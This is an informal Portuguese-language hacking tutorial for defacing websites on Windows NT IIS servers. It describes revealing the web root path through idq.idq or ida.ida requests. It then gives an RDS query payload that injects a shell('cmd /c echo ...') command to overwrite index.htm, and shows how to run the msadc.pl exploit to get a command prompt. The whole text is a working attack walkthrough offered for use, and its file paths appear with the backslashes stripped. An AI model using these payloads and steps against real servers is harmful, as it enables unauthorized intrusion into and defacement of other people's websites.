|
| Obs.: S funciona se o provedor usar Windows NT.
Essa porra usado pra hackear paginas , pra isso vc precisa saber a pasta que se encontra o index ou default, bom na maioria dos casos s digitar wwww.servidor.com/idq.idq, ai aparece a bosta do diretorio!, geralmente c:InetPubwwwroot , bom ai tem que descobrir se o servidor usa index.asp,index.html,index.htm e mesma coisa com default.
Bom exemplo, como fao? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc, bom ai vou ver o diretorio.. anoto num txt, agora s decobrir se index ou default e qual a extenso, bom s testando.. www.servidor.com/index.extenes possiveis ; ou www.servidor.com/default.exetenes possiveis , bom qual entrar o certo ai s anotar, vamos supor que o diretorio :
c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS, ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela do RDS, agora apague tudo que tiver escrito no query e digite:
Select * from Products where ProductType='|shell("cmd /c echo (O QUE QUER QUE APAREA NO SEU HACKED) > c:InetPubwwwrootindex.htm")|'
Depois s apertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, so pegar um exploit chamado msadc.pl e pronto.. vc usa assim:
perl msadc.pl -h www.servidor.com , se aparecer cmd , vc digita :
(O que quer escrever) < C:InetPubwwwrootindex.htm (enter) s isso amigos.. bom aproveito, para ver se o servidor tem o bug do RDS testando com o msadc/samples/adctest.asp ou passando um scaneador de vulneralidades! (gosto do nessus pra linux),pega ele em www.nessus.org.
|
|
|